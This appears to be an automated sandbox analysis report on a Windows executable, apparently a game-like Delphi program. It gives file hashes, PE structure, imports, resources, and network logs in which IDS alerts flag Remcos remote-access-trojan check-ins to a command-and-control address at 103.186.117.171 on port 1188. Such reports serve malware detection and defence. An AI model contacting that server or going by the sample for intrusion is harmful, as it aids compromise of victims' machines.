                                                                                                                            SHA256:8a005601e52341e8aff3c95cf30f4ede6b874d2b7e6ffdb9afda9425733fc5d7
                                                                                                                            SHA512:ac5df65acdb4b3fbe288983eb7498761c64e7e3dd4161d1f74a6b749468c7b5b5209474e91e199625933f439785a730d181c30d2379f791ea5f424fc407649ef
                                                                                                                            SSDEEP:49152:3ARQYxxZrm0UZu0LCi2wcc/Z9L7KtQDSxxZrmh7:3Uxu0UQ0LCccaZ9LU7xuh
                                                                                                                            TLSH:E1A5AEAED264D02AE332463C6747E3D889FD6DE2681CD70739683184CF756A0760BAD7
                                                                                                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                            File Icon

                                                                                                                            Icon Hash:42505c58deaece40

                                                                                                                            Static PE Info

                                                                                                                            General

                                                                                                                            Entrypoint:0x45c720
                                                                                                                            Entrypoint Section:.itext
                                                                                                                            Digitally signed:false
                                                                                                                            Imagebase:0x400000
                                                                                                                            Subsystem:windows gui
                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                            DLL Characteristics:
                                                                                                                            Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                            TLS Callbacks:
                                                                                                                            CLR (.Net) Version:
                                                                                                                            OS Version Major:4
                                                                                                                            OS Version Minor:0
                                                                                                                            File Version Major:4
                                                                                                                            File Version Minor:0
                                                                                                                            Subsystem Version Major:4
                                                                                                                            Subsystem Version Minor:0
                                                                                                                            Import Hash:3693314404800418c83d1170338a8d27

                                                                                                                            Entrypoint Preview

                                                                                                                            Instruction
                                                                                                                            push ebp
                                                                                                                            mov ebp, esp
                                                                                                                            add esp, FFFFFFF0h
                                                                                                                            mov eax, 0045B384h
                                                                                                                            call 00007F2214AF2CD1h
                                                                                                                            mov eax, dword ptr [00528524h]
                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                            call 00007F2214B40B8Dh
                                                                                                                            mov ecx, dword ptr [0052853Ch]
                                                                                                                            mov eax, dword ptr [00528524h]
                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                            mov edx, dword ptr [0045B0A8h]
                                                                                                                            call 00007F2214B40B8Dh
                                                                                                                            mov eax, dword ptr [00528524h]
                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                            call 00007F2214B40C01h
                                                                                                                            call 00007F2214AF0D2Ch
                                                                                                                            lea eax, dword ptr [eax+00h]
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al

                                                                                                                            Data Directories

                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x12d0000x25f8.idata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1390000xe9a00.rsrc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1320000x6548.reloc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x1310000x18.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x12d7100x5e4.idata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                            Sections

                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                            .text0x10000x5a5740x5a60039e735eacb3cf73e0579bbbce729b7a0False0.5238129970608575data6.5270705282910875IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                            .itext0x5c0000x7680x800b37ab156ea01dd5c8dc77b707983554cFalse0.587890625data5.935457813191883IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                            .data0x5d0000xcb6a80xcb8002f74c4ed85846196eecdf1510d44e772False0.6572661528716216data7.28954640161915IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            .bss0x1290000x36540x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            .idata0x12d0000x25f80x26001a69732718434cef2e3b12e9973032d4False0.32421875data5.2035209007067955IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            .tls0x1300000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            .rdata0x1310000x180x200276e7ea558228bcda2072cb58aa90558False0.05078125data0.17014565200323517IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            .reloc0x1320000x65480x6600a59451bd3cafbc67df06335e3023b0ecFalse0.6524203431372549data6.682323619483324IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                            .rsrc0x1390000xe9a000xe9a00fc90df97384003ff0c9299ab17326d9eFalse0.5432101474719101data7.043309886796228IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                            Resources

                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                            WAVE0x13a20c0x1006RIFF (little-endian) data, WAVE audio, Microsoft PCM, 8 bit, mono 22050 HzChineseChina0.45953193564115064
                                                                                                                            RT_CURSOR0x13b2140x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                            RT_CURSOR0x13b3480x134dataEnglishUnited States0.4642857142857143
                                                                                                                            RT_CURSOR0x13b47c0x134dataEnglishUnited States0.4805194805194805
                                                                                                                            RT_CURSOR0x13b5b00x134dataEnglishUnited States0.38311688311688313
                                                                                                                            RT_CURSOR0x13b6e40x134dataEnglishUnited States0.36038961038961037
                                                                                                                            RT_CURSOR0x13b8180x134dataEnglishUnited States0.4090909090909091
                                                                                                                            RT_CURSOR0x13b94c0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                            RT_BITMAP0x13ba800xe528Device independent bitmap graphic, 320 x 180 x 8, image size 57600ChineseChina0.6640017728078549
                                                                                                                            RT_BITMAP0x149fa80x748Device independent bitmap graphic, 30 x 25 x 8, image size 800ChineseChina0.309549356223176
                                                                                                                            RT_BITMAP0x14a6f00x748Device independent bitmap graphic, 30 x 25 x 8, image size 800ChineseChina0.5364806866952789
                                                                                                                            RT_BITMAP0x14ae380x748Device independent bitmap graphic, 30 x 25 x 8, image size 800ChineseChina0.5064377682403434
                                                                                                                            RT_BITMAP0x14b5800x1ec48Device independent bitmap graphic, 437 x 284 x 8, image size 124960ChineseChina0.3863549800038088
                                                                                                                            RT_BITMAP0x16a1c80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                            RT_BITMAP0x16a3980x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                                                                            RT_BITMAP0x16a57c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                            RT_BITMAP0x16a74c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                                                                            RT_BITMAP0x16a91c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                                                                            RT_BITMAP0x16aaec0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                                                                            RT_BITMAP0x16acbc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                                                                            RT_BITMAP0x16ae8c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                            RT_BITMAP0x16b05c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                                                                            RT_BITMAP0x16b22c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                            RT_BITMAP0x16b3fc0x748Device independent bitmap graphic, 30 x 25 x 8, image size 800ChineseChina0.27896995708154504
                                                                                                                            RT_BITMAP0x16bb440x748Device independent bitmap graphic, 30 x 25 x 8, image size 800ChineseChina0.5439914163090128
                                                                                                                            RT_BITMAP0x16c28c0x748Device independent bitmap graphic, 30 x 25 x 8, image size 800ChineseChina0.5311158798283262
                                                                                                                            RT_BITMAP0x16c9d40x7958Device independent bitmap graphic, 300 x 100 x 8, image size 30000ChineseChina0.0792235385011589
                                                                                                                            RT_BITMAP0x17432c0x13028Device independent bitmap graphic, 240 x 320 x 8, image size 76800ChineseChina0.18373060721257578
                                                                                                                            RT_BITMAP0x1873540x748Device independent bitmap graphic, 30 x 25 x 8, image size 800ChineseChina0.23551502145922748
                                                                                                                            RT_BITMAP0x187a9c0x748Device independent bitmap graphic, 30 x 25 x 8, image size 800ChineseChina0.39431330472103004
                                                                                                                            RT_BITMAP0x1881e40x748Device independent bitmap graphic, 30 x 25 x 8, image size 800ChineseChina0.3792918454935622
                                                                                                                            RT_BITMAP0x18892c0xc524Device independent bitmap graphic, 275 x 179 x 8, image size 49404ChineseChina0.040599984148371245
                                                                                                                            RT_BITMAP0x194e500x4b8Device independent bitmap graphic, 12 x 12 x 8, image size 144ChineseChina0.5339403973509934
                                                                                                                            RT_BITMAP0x1953080xc8Device independent bitmap graphic, 12 x 12 x 4, image size 96ChineseChina0.655
                                                                                                                            RT_BITMAP0x1953d00x4b8Device independent bitmap graphic, 12 x 12 x 8, image size 144ChineseChina0.7003311258278145
                                                                                                                            RT_BITMAP0x1958880x748Device independent bitmap graphic, 30 x 25 x 8, image size 800ChineseChina0.20869098712446352
                                                                                                                            RT_BITMAP0x195fd00x748Device independent bitmap graphic, 30 x 25 x 8, image size 800ChineseChina0.3374463519313305
                                                                                                                            RT_BITMAP0x1967180x748Device independent bitmap graphic, 30 x 25 x 8, image size 800ChineseChina0.3310085836909871
                                                                                                                            RT_BITMAP0x196e600xa04Device independent bitmap graphic, 60 x 25 x 8, image size 1500ChineseChina0.4138065522620905
                                                                                                                            RT_BITMAP0x1978640xa04Device independent bitmap graphic, 60 x 25 x 8, image size 1500ChineseChina0.41341653666146644
                                                                                                                            RT_BITMAP0x1982680x748Device independent bitmap graphic, 30 x 25 x 8, image size 800ChineseChina0.2194206008583691
                                                                                                                            RT_BITMAP0x1989b00x748Device independent bitmap graphic, 30 x 25 x 8, image size 800ChineseChina0.4125536480686695
                                                                                                                            RT_BITMAP0x1990f80x748Device independent bitmap graphic, 30 x 25 x 8, image size 800ChineseChina0.40396995708154504
                                                                                                                            RT_BITMAP0x1998400xc524Device independent bitmap graphic, 275 x 179 x 8, image size 49404ChineseChina0.24088531346595862
                                                                                                                            RT_ICON0x1a5d640x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512ChineseChina0.3024193548387097
                                                                                                                            RT_ICON0x1a604c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192ChineseChina0.4560810810810811
                                                                                                                            RT_ICON0x1a61740x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m0.36538461538461536
                                                                                                                            RT_ICON0x1a721c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m0.24481327800829875
                                                                                                                            RT_ICON0x1a97c40x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 3779 x 3779 px/m0.16580406654343807
                                                                                                                            RT_ICON0x1aec4c0x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 25600, resolution 3779 x 3779 px/m0.14218045112781955
                                                                                                                            RT_ICON0x1b54340x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m0.0967851650301668
                                                                                                                            RT_STRING0x1c5c5c0x288data0.4783950617283951
                                                                                                                            RT_STRING0x1c5ee40xc8data0.665
                                                                                                                            RT_STRING0x1c5fac0x10cdata0.6156716417910447
                                                                                                                            RT_STRING0x1c60b80x2f0data0.4587765957446808
                                                                                                                            RT_STRING0x1c63a80x3c0data0.3875
                                                                                                                            RT_STRING0x1c67680x370data0.4022727272727273
                                                                                                                            RT_STRING0x1c6ad80x3ccdata0.33539094650205764
                                                                                                                            RT_STRING0x1c6ea40x214data0.49624060150375937
                                                                                                                            RT_STRING0x1c70b80xccdata0.6274509803921569
                                                                                                                            RT_STRING0x1c71840x194data0.5643564356435643
                                                                                                                            RT_STRING0x1c73180x3c4data0.3288381742738589
                                                                                                                            RT_STRING0x1c76dc0x338data0.42961165048543687
                                                                                                                            RT_STRING0x1c7a140x294data0.42424242424242425
                                                                                                                            RT_RCDATA0x1c7ca80x10data1.5
                                                                                                                            RT_RCDATA0x1c7cb80x264data0.7581699346405228
                                                                                                                            RT_RCDATA0x1c7f1c0x5a632GIF image data, version 89a, 400 x 200EnglishUnited States0.9773975895804184
                                                                                                                            RT_RCDATA0x2225500x286Delphi compiled form 'THighScoreForm'0.6300309597523219
                                                                                                                            RT_GROUP_CURSOR0x2227d80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                            RT_GROUP_CURSOR0x2227ec0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                            RT_GROUP_CURSOR0x2228000x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                            RT_GROUP_CURSOR0x2228140x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                            RT_GROUP_CURSOR0x2228280x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                            RT_GROUP_CURSOR0x22283c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                            RT_GROUP_CURSOR0x2228500x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                            RT_GROUP_ICON0x2228640x4cdata0.8552631578947368
                                                                                                                            RT_GROUP_ICON0x2228b00x22dataChineseChina1.0

                                                                                                                            Imports

                                                                                                                            DLLImport
                                                                                                                            oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                            advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                            user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                                                                            kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                                                                            kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                            user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                            gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                                                                            version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                            kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                                                            advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                                                                            kernel32.dllSleep
                                                                                                                            oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                                                            comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                                                            ntdllZwAllocateVirtualMemory

                                                                                                                            Possible Origin

                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                            ChineseChina
                                                                                                                            EnglishUnited States

                                                                                                                            Network Behavior

                                                                                                                            Snort IDS Alerts

                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                            04/18/24-21:26:56.124863TCP2032776ET TROJAN Remcos 3.x Unencrypted Checkin497071188192.168.2.5103.186.117.171
                                                                                                                            04/18/24-21:29:11.385348TCP2032777ET TROJAN Remcos 3.x Unencrypted Server Response118849707103.186.117.171192.168.2.5

                                                                                                                            Network Port Distribution

                                                                                                                            TCP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Apr 18, 2024 21:26:51.608380079 CEST49704443192.168.2.513.107.139.11
                                                                                                                            Apr 18, 2024 21:26:51.608421087 CEST4434970413.107.139.11192.168.2.5
                                                                                                                            Apr 18, 2024 21:26:51.608500004 CEST49704443192.168.2.513.107.139.11
                                                                                                                            Apr 18, 2024 21:26:51.609765053 CEST49704443192.168.2.513.107.139.11
                                                                                                                            Apr 18, 2024 21:26:51.609816074 CEST4434970413.107.139.11192.168.2.5
                                                                                                                            Apr 18, 2024 21:26:51.609869003 CEST49704443192.168.2.513.107.139.11
                                                                                                                            Apr 18, 2024 21:26:51.638703108 CEST49705443192.168.2.513.107.139.11
                                                                                                                            Apr 18, 2024 21:26:51.638747931 CEST4434970513.107.139.11192.168.2.5
                                                                                                                            Apr 18, 2024 21:26:51.638813972 CEST49705443192.168.2.513.107.139.11
                                                                                                                            Apr 18, 2024 21:26:51.640269995 CEST49705443192.168.2.513.107.139.11
                                                                                                                            Apr 18, 2024 21:26:51.640295029 CEST4434970513.107.139.11192.168.2.5
                                                                                                                            Apr 18, 2024 21:26:52.017973900 CEST4434970513.107.139.11192.168.2.5
                                                                                                                            Apr 18, 2024 21:26:52.018174887 CEST49705443192.168.2.513.107.139.11
                                                                                                                            Apr 18, 2024 21:26:52.021091938 CEST49705443192.168.2.513.107.139.11
                                                                                                                            Apr 18, 2024 21:26:52.021106958 CEST4434970513.107.139.11192.168.2.5
                                                                                                                            Apr 18, 2024 21:26:52.021477938 CEST4434970513.107.139.11192.168.2.5
                                                                                                                            Apr 18, 2024 21:26:52.072983980 CEST49705443192.168.2.513.107.139.11
                                                                                                                            Apr 18, 2024 21:26:52.087528944 CEST49705443192.168.2.513.107.139.11
                                                                                                                            Apr 18, 2024 21:26:52.128117085 CEST4434970513.107.139.11192.168.2.5
                                                                                                                            Apr 18, 2024 21:26:52.384566069 CEST4434970513.107.139.11192.168.2.5
                                                                                                                            Apr 18, 2024 21:26:52.384675026 CEST4434970513.107.139.11192.168.2.5
                                                                                                                            Apr 18, 2024 21:26:52.384741068 CEST49705443192.168.2.513.107.139.11
                                                                                                                            Apr 18, 2024 21:26:52.405451059 CEST49705443192.168.2.513.107.139.11
                                                                                                                            Apr 18, 2024 21:26:52.405478954 CEST4434970513.107.139.11192.168.2.5
                                                                                                                            Apr 18, 2024 21:26:52.405502081 CEST49705443192.168.2.513.107.139.11
                                                                                                                            Apr 18, 2024 21:26:52.405509949 CEST4434970513.107.139.11192.168.2.5
                                                                                                                            Apr 18, 2024 21:26:55.785291910 CEST497071188192.168.2.5103.186.117.171
                                                                                                                            Apr 18, 2024 21:26:56.123765945 CEST118849707103.186.117.171192.168.2.5
                                                                                                                            Apr 18, 2024 21:26:56.123945951 CEST497071188192.168.2.5103.186.117.171
                                                                                                                            Apr 18, 2024 21:26:56.124862909 CEST497071188192.168.2.5103.186.117.171
                                                                                                                            Apr 18, 2024 21:26:56.517659903 CEST118849707103.186.117.171192.168.2.5
                                                                                                                            Apr 18, 2024 21:26:56.577861071 CEST118849707103.186.117.171192.168.2.5
                                                                                                                            Apr 18, 2024 21:26:56.580111027 CEST497071188192.168.2.5103.186.117.171
                                                                                                                            Apr 18, 2024 21:26:56.918478966 CEST118849707103.186.117.171192.168.2.5
                                                                                                                            Apr 18, 2024 21:26:56.968122005 CEST497071188192.168.2.5103.186.117.171
                                                                                                                            Apr 18, 2024 21:26:57.398960114 CEST4970880192.168.2.5178.237.33.50
                                                                                                                            Apr 18, 2024 21:26:57.603097916 CEST8049708178.237.33.50192.168.2.5
                                                                                                                            Apr 18, 2024 21:26:57.603169918 CEST4970880192.168.2.5178.237.33.50
                                                                                                                            Apr 18, 2024 21:26:57.603413105 CEST4970880192.168.2.5178.237.33.50
                                                                                                                            Apr 18, 2024 21:26:57.812165976 CEST8049708178.237.33.50192.168.2.5
                                                                                                                            Apr 18, 2024 21:26:57.812242985 CEST4970880192.168.2.5178.237.33.50
                                                                                                                            Apr 18, 2024 21:26:57.860125065 CEST497071188192.168.2.5103.186.117.171
                                                                                                                            Apr 18, 2024 21:26:58.252233028 CEST118849707103.186.117.171192.168.2.5
                                                                                                                            Apr 18, 2024 21:26:58.811583042 CEST8049708178.237.33.50192.168.2.5
                                                                                                                            Apr 18, 2024 21:26:58.811671972 CEST4970880192.168.2.5178.237.33.50
                                                                                                                            Apr 18, 2024 21:27:11.325884104 CEST118849707103.186.117.171192.168.2.5
                                                                                                                            Apr 18, 2024 21:27:11.328144073 CEST497071188192.168.2.5103.186.117.171
